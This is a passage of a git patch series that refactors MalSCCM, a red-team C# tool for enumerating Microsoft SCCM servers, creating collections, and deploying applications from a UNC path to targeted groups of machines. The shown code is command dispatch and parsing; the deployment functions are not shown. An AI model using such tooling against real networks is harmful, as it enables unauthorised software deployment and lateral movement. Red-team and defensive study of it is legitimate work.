From 43ee8a303882df193ca6f2eaf82bc4abf9c55d6b Mon Sep 17 00:00:00 2001 From: Rasta Mouse Date: Thu, 28 Sep 2023 16:48:38 +0100 Subject: [PATCH 1/7] Update .gitignore --- .gitignore | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.gitignore b/.gitignore index b1c2275..e343822 100644 --- a/.gitignore +++ b/.gitignore @@ -5,4 +5,4 @@ [Bb]in/ [Oo]bj/ .DS_Store - +*.idea From e55cc1eb6611355f294a2ff9afd50df1cb11ad37 Mon Sep 17 00:00:00 2001 From: Rasta Mouse Date: Thu, 28 Sep 2023 16:50:12 +0100 Subject: [PATCH 2/7] Update to C# 11 and move to file-scoped namespaces --- MalSCCM/Args/ArgumentParser.cs | 47 +++++---- MalSCCM/Args/ArgumentParserResult.cs | 29 +++--- MalSCCM/Args/CommandCollection.cs | 65 ++++++------ MalSCCM/Args/Info.cs | 25 +++-- MalSCCM/Commands/App.cs | 133 ++++++++++++------------ MalSCCM/Commands/Checkin.cs | 57 +++++----- MalSCCM/Commands/Group.cs | 149 +++++++++++++-------------- MalSCCM/Commands/ICommand.cs | 9 +- MalSCCM/Commands/Inspect.cs | 145 +++++++++++++------------- MalSCCM/Commands/Locate.cs | 55 +++++----- MalSCCM/MalSCCM.csproj | 2 +- MalSCCM/Program.cs | 63 ++++++----- 12 files changed, 384 insertions(+), 395 deletions(-) diff --git a/MalSCCM/Args/ArgumentParser.cs b/MalSCCM/Args/ArgumentParser.cs index da49f9d..932764d 100644 --- a/MalSCCM/Args/ArgumentParser.cs +++ b/MalSCCM/Args/ArgumentParser.cs @@ -1,43 +1,42 @@ using System.Collections.Generic; using System.Diagnostics; -namespace MalSCCM.Args +namespace MalSCCM.Args; + +public static class ArgumentParser { - public static class ArgumentParser + public static ArgumentParserResult Parse(IEnumerable args) { - public static ArgumentParserResult Parse(IEnumerable args) + var arguments = new Dictionary(); + try { - var arguments = new Dictionary(); - try + foreach (var argument in args) { - foreach (var argument in args) + var idx = argument.IndexOf(':'); + if (idx > 0) + { + arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1); + } + else { - var idx = argument.IndexOf(':'); + idx = argument.IndexOf('='); if (idx > 0) { arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1); } else { - idx = argument.IndexOf('='); - if (idx > 0) - { - arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1); - } - else - { - arguments[argument] = string.Empty; - } + arguments[argument] = string.Empty; } } - - return ArgumentParserResult.Success(arguments); - } - catch (System.Exception ex) - { - Debug.WriteLine(ex.Message); - return ArgumentParserResult.Failure(); } + + return ArgumentParserResult.Success(arguments); + } + catch (System.Exception ex) + { + Debug.WriteLine(ex.Message); + return ArgumentParserResult.Failure(); } } -} +} \ No newline at end of file diff --git a/MalSCCM/Args/ArgumentParserResult.cs b/MalSCCM/Args/ArgumentParserResult.cs index 26c1aca..bd9533c 100644 --- a/MalSCCM/Args/ArgumentParserResult.cs +++ b/MalSCCM/Args/ArgumentParserResult.cs @@ -1,23 +1,22 @@ using System.Collections.Generic; -namespace MalSCCM.Args +namespace MalSCCM.Args; + +public class ArgumentParserResult { - public class ArgumentParserResult - { - public bool ParsedOk { get; } - public Dictionary Arguments { get; } + public bool ParsedOk { get; } + public Dictionary Arguments { get; } - private ArgumentParserResult(bool parsedOk, Dictionary arguments) - { - ParsedOk = parsedOk; - Arguments = arguments; - } + private ArgumentParserResult(bool parsedOk, Dictionary arguments) + { + ParsedOk = parsedOk; + Arguments = arguments; + } - public static ArgumentParserResult Success(Dictionary arguments) - => new ArgumentParserResult(true, arguments); + public static ArgumentParserResult Success(Dictionary arguments) + => new ArgumentParserResult(true, arguments); - public static ArgumentParserResult Failure() - => new ArgumentParserResult(false, null); + public static ArgumentParserResult Failure() + => new ArgumentParserResult(false, null); - } } \ No newline at end of file diff --git a/MalSCCM/Args/CommandCollection.cs b/MalSCCM/Args/CommandCollection.cs index 523a9e4..a7b33f2 100644 --- a/MalSCCM/Args/CommandCollection.cs +++ b/MalSCCM/Args/CommandCollection.cs @@ -2,47 +2,46 @@ using System.Collections.Generic; using MalSCCM.Commands; -namespace MalSCCM.Args +namespace MalSCCM.Args; + +public class CommandCollection { - public class CommandCollection - { - private readonly Dictionary> _availableCommands = new Dictionary>(); + private readonly Dictionary> _availableCommands = new Dictionary>(); - // How To Add A New Command: - // 1. Create your command class in the Commands Folder - // a. That class must have a CommandName static property that has the Command's name - // and must also Implement the ICommand interface - // b. Put the code that does the work into the Execute() method - // 2. Add an entry to the _availableCommands dictionary in the Constructor below. + // How To Add A New Command: + // 1. Create your command class in the Commands Folder + // a. That class must have a CommandName static property that has the Command's name + // and must also Implement the ICommand interface + // b. Put the code that does the work into the Execute() method + // 2. Add an entry to the _availableCommands dictionary in the Constructor below. - public CommandCollection() - { - _availableCommands.Add(Inspect.CommandName, () => new Inspect()); - _availableCommands.Add(Group.CommandName, () => new Group()); - _availableCommands.Add(App.CommandName, () => new App()); - _availableCommands.Add(Checkin.CommandName, () => new Checkin()); - _availableCommands.Add(Locate.CommandName, () => new Locate()); + public CommandCollection() + { + _availableCommands.Add(Inspect.CommandName, () => new Inspect()); + _availableCommands.Add(Group.CommandName, () => new Group()); + _availableCommands.Add(App.CommandName, () => new App()); + _availableCommands.Add(Checkin.CommandName, () => new Checkin()); + _availableCommands.Add(Locate.CommandName, () => new Locate()); - } + } + + public bool ExecuteCommand(string commandName, Dictionary arguments) + { + bool commandWasFound; - public bool ExecuteCommand(string commandName, Dictionary arguments) + if (string.IsNullOrEmpty(commandName) || _availableCommands.ContainsKey(commandName) == false) + commandWasFound= false; + else { - bool commandWasFound; - - if (string.IsNullOrEmpty(commandName) || _availableCommands.ContainsKey(commandName) == false) - commandWasFound= false; - else - { - // Create the command object - var command = _availableCommands[commandName].Invoke(); + // Create the command object + var command = _availableCommands[commandName].Invoke(); - // and execute it with the arguments from the command line - command.Execute(arguments); + // and execute it with the arguments from the command line + command.Execute(arguments); - commandWasFound = true; - } - - return commandWasFound; + commandWasFound = true; } + + return commandWasFound; } } \ No newline at end of file diff --git a/MalSCCM/Args/Info.cs b/MalSCCM/Args/Info.cs index f0a4d28..08515a1 100644 --- a/MalSCCM/Args/Info.cs +++ b/MalSCCM/Args/Info.cs @@ -1,24 +1,24 @@ using System; -namespace MalSCCM.Args +namespace MalSCCM.Args; + +public static class Info { - public static class Info + public static void ShowLogo() { - public static void ShowLogo() - { - string logo = @" __ __ _ ____ ____ ____ __ __ + string logo = @" __ __ _ ____ ____ ____ __ __ | \/ | __ _| / ___| / ___/ ___| \/ | | |\/| |/ _` | \___ \| | | | | |\/| | | | | | (_| | |___) | |__| |___| | | | |_| |_|\__,_|_|____/ \____\____|_| |_| Phil Keeble @ Nettitude Red Team "; - Console.WriteLine(logo); - } + Console.WriteLine(logo); + } - public static void ShowUsage() - { - string usage = @"Commands listed below have optional parameters in <>. + public static void ShowUsage() + { + string usage = @"Commands listed below have optional parameters in <>. Attempt to find the SCCM management and primary servers: MalSCCM.exe locate @@ -42,7 +42,6 @@ MalSCCM.exe locate Force devices of a group to checkin within a couple minutes: MalSCCM.exe checkin /groupname:example "; - Console.WriteLine(usage); - } + Console.WriteLine(usage); } -} +} \ No newline at end of file diff --git a/MalSCCM/Commands/App.cs b/MalSCCM/Commands/App.cs index f332388..21a21f9 100644 --- a/MalSCCM/Commands/App.cs +++ b/MalSCCM/Commands/App.cs @@ -1,92 +1,91 @@ using System; using System.Collections.Generic; -namespace MalSCCM.Commands +namespace MalSCCM.Commands; + +public class App : ICommand { - public class App : ICommand - { - public static string CommandName => "app"; - public static string AppName = ""; - public static string UNCPath = ""; - public static string AssignmentName = ""; + public static string CommandName => "app"; + public static string AppName = ""; + public static string UNCPath = ""; + public static string AssignmentName = ""; - public void Execute(Dictionary arguments) + public void Execute(Dictionary arguments) + { + if (arguments.ContainsKey("/server")) { - if (arguments.ContainsKey("/server")) - { - Inspect.ServerName = arguments["/server"]; - } + Inspect.ServerName = arguments["/server"]; + } - Console.WriteLine("[*] Action: Manipulating SCCM Applications"); + Console.WriteLine("[*] Action: Manipulating SCCM Applications"); - if (arguments.ContainsKey("/groupname")) - { - Group.GroupName = arguments["/groupname"]; - } + if (arguments.ContainsKey("/groupname")) + { + Group.GroupName = arguments["/groupname"]; + } - if (arguments.ContainsKey("/name")) - { - AppName = arguments["/name"]; - } + if (arguments.ContainsKey("/name")) + { + AppName = arguments["/name"]; + } - if (arguments.ContainsKey("/uncpath")) - { - UNCPath = arguments["/uncpath"]; - } + if (arguments.ContainsKey("/uncpath")) + { + UNCPath = arguments["/uncpath"]; + } - if (arguments.ContainsKey("/assignmentname")) - { - AssignmentName = arguments["/assignmentname"]; - } + if (arguments.ContainsKey("/assignmentname")) + { + AssignmentName = arguments["/assignmentname"]; + } - if (!Enum.FbGetSiteScope()) + if (!Enum.FbGetSiteScope()) + { + Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); + if (!Enum.FbGetSiteScope2()) { - Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); - if (!Enum.FbGetSiteScope2()) - { - Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); - Enum.FbGetSiteScope3(); - } + Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); + Enum.FbGetSiteScope3(); } + } - if (arguments.ContainsKey("/create")) - { - Console.WriteLine("[*] Action: Creating SCCM Application"); - Application.FbCreateSCCMApplication(); - } + if (arguments.ContainsKey("/create")) + { + Console.WriteLine("[*] Action: Creating SCCM Application"); + Application.FbCreateSCCMApplication(); + } - if (arguments.ContainsKey("/delete")) - { - Console.WriteLine("[*] Action: Deleting SCCM Application"); - Application.FbRemoveSCCMApplication(); - } + if (arguments.ContainsKey("/delete")) + { + Console.WriteLine("[*] Action: Deleting SCCM Application"); + Application.FbRemoveSCCMApplication(); + } - if (arguments.ContainsKey("/deploy")) - { - Console.WriteLine("[*] Action: Gathering group ID"); - Groups.FbGetSCCMCollectionID(); - Console.WriteLine("[*] Action: Deploying SCCM Application"); - Application.FbDeploySCCMApplication(); - } + if (arguments.ContainsKey("/deploy")) + { + Console.WriteLine("[*] Action: Gathering group ID"); + Groups.FbGetSCCMCollectionID(); + Console.WriteLine("[*] Action: Deploying SCCM Application"); + Application.FbDeploySCCMApplication(); + } - if (arguments.ContainsKey("/deletedeploy")) - { - Console.WriteLine("[*] Action: Removing SCCM Application Deployment"); - Application.FbRemoveSCCMApplicationDeployment(); - } + if (arguments.ContainsKey("/deletedeploy")) + { + Console.WriteLine("[*] Action: Removing SCCM Application Deployment"); + Application.FbRemoveSCCMApplicationDeployment(); + } - if (arguments.ContainsKey("/cleanup")) - { - Console.WriteLine("[*] Action: Removing SCCM Application Deployment"); - Application.FbRemoveSCCMApplicationDeployment(); - Console.WriteLine("[*] Action: Deleting SCCM Application"); - Application.FbRemoveSCCMApplication(); - } + if (arguments.ContainsKey("/cleanup")) + { + Console.WriteLine("[*] Action: Removing SCCM Application Deployment"); + Application.FbRemoveSCCMApplicationDeployment(); + Console.WriteLine("[*] Action: Deleting SCCM Application"); + Application.FbRemoveSCCMApplication(); + } - Console.WriteLine("\r\n[*] App complete\r\n"); - } + Console.WriteLine("\r\n[*] App complete\r\n"); } } \ No newline at end of file diff --git a/MalSCCM/Commands/Checkin.cs b/MalSCCM/Commands/Checkin.cs index 0766f47..f805eaa 100644 --- a/MalSCCM/Commands/Checkin.cs +++ b/MalSCCM/Commands/Checkin.cs @@ -1,46 +1,45 @@ using System; using System.Collections.Generic; -namespace MalSCCM.Commands +namespace MalSCCM.Commands; + +public class Checkin : ICommand { - public class Checkin : ICommand - { - public static string CommandName => "checkin"; + public static string CommandName => "checkin"; - public void Execute(Dictionary arguments) + public void Execute(Dictionary arguments) + { + if (arguments.ContainsKey("/server")) { - if (arguments.ContainsKey("/server")) - { - Inspect.ServerName = arguments["/server"]; - } + Inspect.ServerName = arguments["/server"]; + } - Console.WriteLine("[*] Action: Causing SCCM poll"); + Console.WriteLine("[*] Action: Causing SCCM poll"); - if (arguments.ContainsKey("/groupname")) - { - Group.GroupName = arguments["/groupname"]; - } + if (arguments.ContainsKey("/groupname")) + { + Group.GroupName = arguments["/groupname"]; + } - if (!Enum.FbGetSiteScope()) + if (!Enum.FbGetSiteScope()) + { + Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); + if (!Enum.FbGetSiteScope2()) { - Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); - if (!Enum.FbGetSiteScope2()) - { - Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); - Enum.FbGetSiteScope3(); - } + Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); + Enum.FbGetSiteScope3(); } + } - if (arguments.ContainsKey("/groupname")) - { - Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); - Groups.FbGetSCCMCollectionID(); - Console.WriteLine("[*] Action: Forcing Group To Checkin for Updates"); - Check.FbSCCMDeviceCheckin(); - } - Console.WriteLine("\r\n[*] Checkin complete\r\n"); + if (arguments.ContainsKey("/groupname")) + { + Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); + Groups.FbGetSCCMCollectionID(); + Console.WriteLine("[*] Action: Forcing Group To Checkin for Updates"); + Check.FbSCCMDeviceCheckin(); } + Console.WriteLine("\r\n[*] Checkin complete\r\n"); } } \ No newline at end of file diff --git a/MalSCCM/Commands/Group.cs b/MalSCCM/Commands/Group.cs index 3f768d8..cf8de4e 100644 --- a/MalSCCM/Commands/Group.cs +++ b/MalSCCM/Commands/Group.cs @@ -1,99 +1,98 @@ using System; using System.Collections.Generic; -namespace MalSCCM.Commands +namespace MalSCCM.Commands; + +public class Group : ICommand { - public class Group : ICommand - { - public static string CommandName => "group"; - public static string GroupName = ""; - public static string GroupType = ""; - public static string SystemCollectionID = ""; - public static string UserCollectionID = ""; - public static string TargetCollectionID = ""; - public static string UserName = ""; - public static string DeviceName = ""; - public static string ResourceID = ""; + public static string CommandName => "group"; + public static string GroupName = ""; + public static string GroupType = ""; + public static string SystemCollectionID = ""; + public static string UserCollectionID = ""; + public static string TargetCollectionID = ""; + public static string UserName = ""; + public static string DeviceName = ""; + public static string ResourceID = ""; - public void Execute(Dictionary arguments) + public void Execute(Dictionary arguments) + { + if (arguments.ContainsKey("/server")) { - if (arguments.ContainsKey("/server")) - { - Inspect.ServerName = arguments["/server"]; - } + Inspect.ServerName = arguments["/server"]; + } - Console.WriteLine("[*] Action: Manipulating SCCM Groups"); + Console.WriteLine("[*] Action: Manipulating SCCM Groups"); - if (arguments.ContainsKey("/groupname")) - { - GroupName = arguments["/groupname"]; - } + if (arguments.ContainsKey("/groupname")) + { + GroupName = arguments["/groupname"]; + } - if (arguments.ContainsKey("/grouptype")) - { - GroupType = arguments["/grouptype"]; - } + if (arguments.ContainsKey("/grouptype")) + { + GroupType = arguments["/grouptype"]; + } - if (arguments.ContainsKey("/user")) - { - UserName = arguments["/user"]; - } + if (arguments.ContainsKey("/user")) + { + UserName = arguments["/user"]; + } - if (arguments.ContainsKey("/host")) - { - DeviceName = arguments["/host"]; - } + if (arguments.ContainsKey("/host")) + { + DeviceName = arguments["/host"]; + } - if (!Enum.FbGetSiteScope()) + if (!Enum.FbGetSiteScope()) + { + Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); + if (!Enum.FbGetSiteScope2()) { - Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); - if (!Enum.FbGetSiteScope2()) - { - Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); - Enum.FbGetSiteScope3(); - } + Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); + Enum.FbGetSiteScope3(); } + } - if (arguments.ContainsKey("/create")) - { - Console.WriteLine("[*] Action: Creating SCCM Group"); - Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); - Groups.FbGetSCCMCollectionID(); - Console.WriteLine("\r\n[*] Action: Creating Collection"); - Groups.FbNewSCCMCollection(); - } + if (arguments.ContainsKey("/create")) + { + Console.WriteLine("[*] Action: Creating SCCM Group"); + Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); + Groups.FbGetSCCMCollectionID(); + Console.WriteLine("\r\n[*] Action: Creating Collection"); + Groups.FbNewSCCMCollection(); + } - if (arguments.ContainsKey("/delete")) - { - Console.WriteLine("[*] Action: Deleting SCCM Group"); - Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); - Groups.FbGetSCCMCollectionID(); - Console.WriteLine("\r\n[*] Action: Removing Collection"); - Groups.FbRemoveSCCMCollection(); - } + if (arguments.ContainsKey("/delete")) + { + Console.WriteLine("[*] Action: Deleting SCCM Group"); + Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); + Groups.FbGetSCCMCollectionID(); + Console.WriteLine("\r\n[*] Action: Removing Collection"); + Groups.FbRemoveSCCMCollection(); + } - if (arguments.ContainsKey("/adduser")) - { - Console.WriteLine("[*] Action: Adding User to an SCCM Group"); - Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); - Groups.FbGetSCCMCollectionID(); - Console.WriteLine("\r\n[*] Action: Adding User"); - Groups.FbAddUserToSCCMCollection(); - } + if (arguments.ContainsKey("/adduser")) + { + Console.WriteLine("[*] Action: Adding User to an SCCM Group"); + Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); + Groups.FbGetSCCMCollectionID(); + Console.WriteLine("\r\n[*] Action: Adding User"); + Groups.FbAddUserToSCCMCollection(); + } - if (arguments.ContainsKey("/addhost")) - { - Console.WriteLine("[*] Action: Adding System to an SCCM Group"); - Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); - Groups.FbGetSCCMCollectionID(); - Console.WriteLine("\r\n[*] Action: Adding Device"); - Groups.FbAddDeviceToSCCMCollection(); - } + if (arguments.ContainsKey("/addhost")) + { + Console.WriteLine("[*] Action: Adding System to an SCCM Group"); + Console.WriteLine("\r\n[*] Action: Getting Collection IDs"); + Groups.FbGetSCCMCollectionID(); + Console.WriteLine("\r\n[*] Action: Adding Device"); + Groups.FbAddDeviceToSCCMCollection(); + } - Console.WriteLine("\r\n[*] Group complete\r\n"); - } + Console.WriteLine("\r\n[*] Group complete\r\n"); } } \ No newline at end of file diff --git a/MalSCCM/Commands/ICommand.cs b/MalSCCM/Commands/ICommand.cs index 4330083..2c14d86 100644 --- a/MalSCCM/Commands/ICommand.cs +++ b/MalSCCM/Commands/ICommand.cs @@ -1,9 +1,8 @@ using System.Collections.Generic; -namespace MalSCCM.Commands +namespace MalSCCM.Commands; + +public interface ICommand { - public interface ICommand - { - void Execute(Dictionary arguments); - } + void Execute(Dictionary arguments); } \ No newline at end of file diff --git a/MalSCCM/Commands/Inspect.cs b/MalSCCM/Commands/Inspect.cs index 61d4654..2ff2ecd 100644 --- a/MalSCCM/Commands/Inspect.cs +++ b/MalSCCM/Commands/Inspect.cs @@ -1,99 +1,98 @@ using System; using System.Collections.Generic; -namespace MalSCCM.Commands +namespace MalSCCM.Commands; + +public class Inspect : ICommand { - public class Inspect : ICommand - { - public static string CommandName => "inspect"; - public static string SiteCode = ""; - public static string ServerName = "localhost"; + public static string CommandName => "inspect"; + public static string SiteCode = ""; + public static string ServerName = "localhost"; - public void Execute(Dictionary arguments) + public void Execute(Dictionary arguments) + { + if (arguments.ContainsKey("/server")) { - if (arguments.ContainsKey("/server")) - { - ServerName = arguments["/server"]; - } + ServerName = arguments["/server"]; + } - Console.WriteLine("[*] Action: Inspect SCCM Server"); + Console.WriteLine("[*] Action: Inspect SCCM Server"); - if (!Enum.FbGetSiteScope()) + if (!Enum.FbGetSiteScope()) + { + Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); + if (!Enum.FbGetSiteScope2()) { - Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); - if (!Enum.FbGetSiteScope2()) - { - Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); - Enum.FbGetSiteScope3(); - } + Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); + Enum.FbGetSiteScope3(); } + } - if (arguments.ContainsKey("/all")) - { + if (arguments.ContainsKey("/all")) + { - Console.WriteLine("\r\n[*] Action: Get SCCM Computers"); - Enum.FbGetSCCMComputer(); - Console.WriteLine("\r\n[*] Action: Get SCCM AD Forest"); - Enum.FbGetSCCMADForest(); - Console.WriteLine("\r\n[*] Action: Get SCCM Applications"); - Enum.FbGetSCCMApplication(); - Console.WriteLine("\r\n[*] Action: Get SCCM Packages"); - Enum.FbGetSCCMPackage(); - Console.WriteLine("\r\n[*] Action: Get SCCM Collections (Groups)"); - Enum.FbGetSCCMCollection(); - Console.WriteLine("\r\n[*] Action: Get SCCM Primary Users"); - Enum.FbGetSCCMPrimaryUser(); - Console.WriteLine("\r\n[*] Action: Get SCCM Deployments"); - Enum.FbGetSCCMDeployments(); - } + Console.WriteLine("\r\n[*] Action: Get SCCM Computers"); + Enum.FbGetSCCMComputer(); + Console.WriteLine("\r\n[*] Action: Get SCCM AD Forest"); + Enum.FbGetSCCMADForest(); + Console.WriteLine("\r\n[*] Action: Get SCCM Applications"); + Enum.FbGetSCCMApplication(); + Console.WriteLine("\r\n[*] Action: Get SCCM Packages"); + Enum.FbGetSCCMPackage(); + Console.WriteLine("\r\n[*] Action: Get SCCM Collections (Groups)"); + Enum.FbGetSCCMCollection(); + Console.WriteLine("\r\n[*] Action: Get SCCM Primary Users"); + Enum.FbGetSCCMPrimaryUser(); + Console.WriteLine("\r\n[*] Action: Get SCCM Deployments"); + Enum.FbGetSCCMDeployments(); + } - if (arguments.ContainsKey("/computers")) - { - Console.WriteLine("\r\n[*] Action: Get SCCM Computers"); - Enum.FbGetSCCMComputer(); - } + if (arguments.ContainsKey("/computers")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM Computers"); + Enum.FbGetSCCMComputer(); + } - if (arguments.ContainsKey("/forest")) - { - Console.WriteLine("\r\n[*] Action: Get SCCM AD Forest"); - Enum.FbGetSCCMADForest(); - } + if (arguments.ContainsKey("/forest")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM AD Forest"); + Enum.FbGetSCCMADForest(); + } - if (arguments.ContainsKey("/applications")) - { - Console.WriteLine("\r\n[*] Action: Get SCCM Applications"); - Enum.FbGetSCCMApplication(); - } + if (arguments.ContainsKey("/applications")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM Applications"); + Enum.FbGetSCCMApplication(); + } - if (arguments.ContainsKey("/packages")) - { - Console.WriteLine("\r\n[*] Action: Get SCCM Packages"); - Enum.FbGetSCCMPackage(); - } + if (arguments.ContainsKey("/packages")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM Packages"); + Enum.FbGetSCCMPackage(); + } - if (arguments.ContainsKey("/groups")) - { - Console.WriteLine("\r\n[*] Action: Get SCCM Collections (Groups)"); - Enum.FbGetSCCMCollection(); - } + if (arguments.ContainsKey("/groups")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM Collections (Groups)"); + Enum.FbGetSCCMCollection(); + } - if (arguments.ContainsKey("/primaryusers")) - { - Console.WriteLine("\r\n[*] Action: Get SCCM Primary Users"); - Enum.FbGetSCCMPrimaryUser(); - } + if (arguments.ContainsKey("/primaryusers")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM Primary Users"); + Enum.FbGetSCCMPrimaryUser(); + } - if (arguments.ContainsKey("/deployments")) - { - Console.WriteLine("\r\n[*] Action: Get SCCM Deployments"); - Enum.FbGetSCCMDeployments(); - } + if (arguments.ContainsKey("/deployments")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM Deployments"); + Enum.FbGetSCCMDeployments(); + } - Console.WriteLine("\r\n[*] Inspect complete\r\n"); - } + Console.WriteLine("\r\n[*] Inspect complete\r\n"); } } \ No newline at end of file diff --git a/MalSCCM/Commands/Locate.cs b/MalSCCM/Commands/Locate.cs index db15508..06cbe3c 100644 --- a/MalSCCM/Commands/Locate.cs +++ b/MalSCCM/Commands/Locate.cs @@ -1,46 +1,45 @@ using System; using System.Collections.Generic; -namespace MalSCCM.Commands +namespace MalSCCM.Commands; + +public class Locate : ICommand { - public class Locate : ICommand - { - public static string CommandName => "locate"; - public static string SiteCode = ""; - public static string ServerName = "localhost"; + public static string CommandName => "locate"; + public static string SiteCode = ""; + public static string ServerName = "localhost"; - public void Execute(Dictionary arguments) + public void Execute(Dictionary arguments) + { + if (arguments.ContainsKey("/server")) { - if (arguments.ContainsKey("/server")) - { - ServerName = arguments["/server"]; - } + ServerName = arguments["/server"]; + } - Console.WriteLine("[*] Action: Locating SCCM Management Servers"); + Console.WriteLine("[*] Action: Locating SCCM Management Servers"); - if (!Enum.FbGetSiteScope()) + if (!Enum.FbGetSiteScope()) + { + Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); + if (!Enum.FbGetSiteScope2()) { - Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead"); - if (!Enum.FbGetSiteScope2()) - { - Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); - Enum.FbGetSiteScope3(); - } + Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys"); + Enum.FbGetSiteScope3(); } + } - Console.WriteLine("\r\n[!] Note - Managment Server may not be the Primary Server which is needed for exploitation."); - Console.WriteLine("[!] Note - You can try use 'inspect /server:' to see if the management server is exploitable."); - Console.WriteLine("[!] Note - If you are on a management server, the registry checks below should return the primary server"); + Console.WriteLine("\r\n[!] Note - Managment Server may not be the Primary Server which is needed for exploitation."); + Console.WriteLine("[!] Note - You can try use 'inspect /server:' to see if the management server is exploitable."); + Console.WriteLine("[!] Note - If you are on a management server, the registry checks below should return the primary server"); - Console.WriteLine("\r\n[*] Action: Locating SCCM Servers in Registry"); + Console.WriteLine("\r\n[*] Action: Locating SCCM Servers in Registry"); - Enum.FbGetSCCMPrimaryServerRegKey(); + Enum.FbGetSCCMPrimaryServerRegKey(); - Console.WriteLine("\r\n[!] Note - If looking for reg keys failed, make sure you are on a management server!"); - Console.WriteLine("[!] Note - Alternate ways of finding the primary server could be shares on the network (SMS_) will be the name of a share on the primary server."); + Console.WriteLine("\r\n[!] Note - If looking for reg keys failed, make sure you are on a management server!"); + Console.WriteLine("[!] Note - Alternate ways of finding the primary server could be shares on the network (SMS_) will be the name of a share on the primary server."); - Console.WriteLine("\r\n[*] Locate complete\r\n"); - } + Console.WriteLine("\r\n[*] Locate complete\r\n"); } } \ No newline at end of file diff --git a/MalSCCM/MalSCCM.csproj b/MalSCCM/MalSCCM.csproj index 53d038d..cefe1d0 100644 --- a/MalSCCM/MalSCCM.csproj +++ b/MalSCCM/MalSCCM.csproj @@ -8,9 +8,9 @@ Exe MalSCCM MalSCCM - v3.5 512 true + 11 AnyCPU diff --git a/MalSCCM/Program.cs b/MalSCCM/Program.cs index a08553c..b3c2457 100644 --- a/MalSCCM/Program.cs +++ b/MalSCCM/Program.cs @@ -2,46 +2,45 @@ using System.Collections.Generic; using MalSCCM.Args; -namespace MalSCCM +namespace MalSCCM; + +class Program { - class Program + private static void MainExecute(string commandName, Dictionary parsedArgs) { - private static void MainExecute(string commandName, Dictionary parsedArgs) - { - // main execution logic + // main execution logic - Info.ShowLogo(); + Info.ShowLogo(); - try - { - var commandFound = new CommandCollection().ExecuteCommand(commandName, parsedArgs); - - // show the usage if no commands were found for the command name - if (commandFound == false) - Info.ShowUsage(); - } - catch (Exception e) - { - Console.WriteLine("\r\n[!] Unhandled MalSCCM exception:\r\n"); - Console.WriteLine(e); - } + try + { + var commandFound = new CommandCollection().ExecuteCommand(commandName, parsedArgs); + + // show the usage if no commands were found for the command name + if (commandFound == false) + Info.ShowUsage(); + } + catch (Exception e) + { + Console.WriteLine("\r\n[!] Unhandled MalSCCM exception:\r\n"); + Console.WriteLine(e); } + } - public static void Main(string[] args) + public static void Main(string[] args) + { + // try to parse the command line arguments, show usage on failure and then bail + var parsed = ArgumentParser.Parse(args); + if (parsed.ParsedOk == false) { - // try to parse the command line arguments, show usage on failure and then bail - var parsed = ArgumentParser.Parse(args); - if (parsed.ParsedOk == false) - { - Info.ShowLogo(); - Info.ShowUsage(); - return; - } + Info.ShowLogo(); + Info.ShowUsage(); + return; + } - var commandName = args.Length != 0 ? args[0] : ""; + var commandName = args.Length != 0 ? args[0] : ""; - MainExecute(commandName, parsed.Arguments); + MainExecute(commandName, parsed.Arguments); - } } -} +} \ No newline at end of file From 3db30ece71d61b217d9a1b20692b73f6dd325de0 Mon Sep 17 00:00:00 2001 From: Rasta Mouse Date: Thu, 28 Sep 2023 16:51:12 +0100 Subject: [PATCH 3/7] Update Info.cs Use raw const strings --- MalSCCM/Args/Info.cs | 68 ++++++++++++++++++++++++-------------------- 1 file changed, 37 insertions(+), 31 deletions(-) diff --git a/MalSCCM/Args/Info.cs b/MalSCCM/Args/Info.cs index 08515a1..2159405 100644 --- a/MalSCCM/Args/Info.cs +++ b/MalSCCM/Args/Info.cs @@ -6,42 +6,48 @@ public static class Info { public static void ShowLogo() { - string logo = @" __ __ _ ____ ____ ____ __ __ -| \/ | __ _| / ___| / ___/ ___| \/ | -| |\/| |/ _` | \___ \| | | | | |\/| | -| | | | (_| | |___) | |__| |___| | | | -|_| |_|\__,_|_|____/ \____\____|_| |_| - Phil Keeble @ Nettitude Red Team -"; + const string logo = """ + __ __ _ ____ ____ ____ __ __ + | \/ | __ _| / ___| / ___/ ___| \/ | + | |\/| |/ _` | \___ \| | | | | |\/| | + | | | | (_| | |___) | |__| |___| | | | + |_| |_|\__,_|_|____/ \____\____|_| |_| + Phil Keeble @ Nettitude Red Team + + """; + Console.WriteLine(logo); } public static void ShowUsage() { - string usage = 